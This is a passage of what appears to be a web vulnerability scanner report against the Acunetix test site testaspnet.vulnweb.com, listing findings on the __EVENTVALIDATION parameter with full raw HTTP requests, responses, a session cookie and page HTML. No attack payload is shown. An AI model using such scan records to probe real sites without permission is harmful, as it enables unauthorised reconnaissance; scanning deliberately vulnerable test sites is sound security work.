vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1209 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,209 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8475&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAy2KxJdsIZGRkofQWb0ztptW10p%2BJgF0Qh9BLanI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLU6fQIAtGnrvIOAtCn5uMHAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBQKK%2BdfZCQKK%2BdfZCQKK%2Bcv8AgKK%2Bcv8AgKK%2Bf%2BTCgKK%2Bf%2BTCgKK%2BZO2AwKK%2BZO2AwKK%2BYfNDAKK%2BYfNDAKK%2BbvgBQKK%2BbvgBQKK%2Ba%2BHDQKK%2Ba%2BHDQKK%2BYPsCwKK%2BYPsCwKK%2BbeDAwKK%2BbeDAwK%2Fk%2BPECQK%2Fk%2BPECQK%2Fk5ebAQK%2Fk5ebAQK%2Fk4u%2BCgK%2Fk4u%2BCgK%2Fk7%2FVAwK%2Fk7%2FVAwK%2Fk9PpDAK%2Fk9PpDAK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkHuWc%2BNSvvhQDvU1zixs2Jty0QRg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:41 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAy2KxJdsIZGRkofQWb0ztptW10p+JgF0Qh9BLanI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLU6fQIAtGnrvIOAtCn5uMHAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBQKK+dfZCQKK+dfZCQKK+cv8AgKK+cv8AgKK+f+TCgKK+f+TCgKK+ZO2AwKK+ZO2AwKK+YfNDAKK+YfNDAKK+bvgBQKK+bvgBQKK+a+HDQKK+a+HDQKK+YPsCwKK+YPsCwKK+beDAwKK+beDAwK/k+PECQK/k+PECQK/k5ebAQK/k5ebAQK/k4u+CgK/k4u+CgK/k7/VAwK/k7/VAwK/k9PpDAK/k9PpDAK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkHuWc+NSvvhQDvU1zixs2Jty0QRg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:White" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8213&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAkfrPV9oIZGRk4Icj9k5ViAEUS1NJZL9Rv9zHijI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLu6vOlDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bsy0BrMJSvbwxK2uadXn02LfDfHw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:28 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAkfrPV9oIZGRk4Icj9k5ViAEUS1NJZL9Rv9zHijI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLu6vOlDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+sy0BrMJSvbwxK2uadXn02LfDfHw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:White" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 